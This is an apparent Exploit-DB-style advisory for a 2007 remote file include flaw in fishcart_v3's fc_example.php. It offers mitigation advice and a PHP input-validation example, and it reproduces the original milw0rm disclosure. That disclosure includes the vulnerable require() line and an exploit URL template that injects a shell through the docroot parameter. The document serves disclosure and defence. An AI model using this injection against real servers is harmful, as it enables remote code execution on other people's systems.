Vendor: fishcart_v3
By: k1n9k0ng
CVSS: 5.5 (MEDIUM)
Remote File Include
CWE: 98
Product Name: fishcart_v3
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

fishcart_v3 (fc_example.php) Remote File Include Vulnerability

fc_example.php in the fishcart_v3 script uses the 'docroot' parameter as the prefix of a require() path, so an attacker who manipulates that parameter can make the script include a remote file. This can lead to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update the fishcart_v3 script to the latest version and ensure that user input is properly validated and sanitized before being used in file inclusion functions.
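
The validation this mitigation calls for, as an added PHP example (not FishCart's code and not part of the advisory). It assumes `docroot` reaches the script from the query string; `fc_include_path`, `FC_SUFFIX` and the temporary demo tree are hypothetical names constructed here.

```php
<?php
// Added example, not FishCart code. Assumption: $docroot is populated from the
// query string (register_globals or an extract() of request data).
// Vulnerable form quoted in the advisory:
//   require($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');

const FC_SUFFIX = '/FCDIRECTORY/fc_functions/fc_functions.php';

/**
 * Hypothetical helper: return the canonical file to include, or null when the
 * candidate docroot does not resolve to the root configured server-side.
 */
function fc_include_path(string $candidate, string $configuredRoot): ?string
{
    // URL and stream wrappers (http://, ftp://, php://, data:) are never a docroot.
    if (preg_match('#^[a-z][a-z0-9+.-]+:#i', $candidate) || strpos($candidate, "\0") !== false) {
        return null;
    }
    $root = realpath($configuredRoot);
    $full = realpath($candidate . FC_SUFFIX);   // resolves ../ and symlinks
    if ($root === false || $full === false || !is_file($full)) {
        return null;
    }
    // The resolved file must be exactly the one under the configured root.
    $expected = $root . str_replace('/', DIRECTORY_SEPARATOR, FC_SUFFIX);
    return $full === $expected ? $full : null;
}

// Constructed demo tree so the script runs offline.
$root = sys_get_temp_dir() . '/fc_demo_' . getmypid();
mkdir($root . '/FCDIRECTORY/fc_functions', 0700, true);
file_put_contents($root . FC_SUFFIX, "<?php // constructed stand-in\n");

// Constructed candidate values for docroot.
$candidates = [
    $root,                               // the configured root itself
    $root . '/FCDIRECTORY/..',           // the same root spelled with ../
    'http://example.invalid/payload',    // a URL wrapper
    sys_get_temp_dir(),                  // a different local directory
];
foreach ($candidates as $c) {
    $path = fc_include_path($c, $root);
    printf("%-60s %s\n", $c, $path === null ? 'REJECT' : 'ACCEPT');
    if ($path !== null) {
        require_once $path;              // only ever the configured file
    }
}
```

Independently of the code fix, `allow_url_include = Off` in php.ini stops require() from fetching URL wrappers, and `register_globals = Off` stops query parameters from becoming global variables.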

Exploit-DB raw data:

fishcart_v3 (fc_example.php) Remote File Include Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts            : fishcart_v3
Discovered By : k1n9k0ng
Scripts site      :
http://fishcart.org/fc_installer_snap_2007_08_03.zip
http://fishcart.org/fishcart_snap_2007_08_03
http://fishcart.org/fishcart_snap_2007_08_03.tgz

Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To       : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site                 : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
<?php require($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php'); ?>

bug found:
"/fishcart_v3/fc_functions/fc_example.php?docroot=[shell]"

# milw0rm.com [2007-08-08]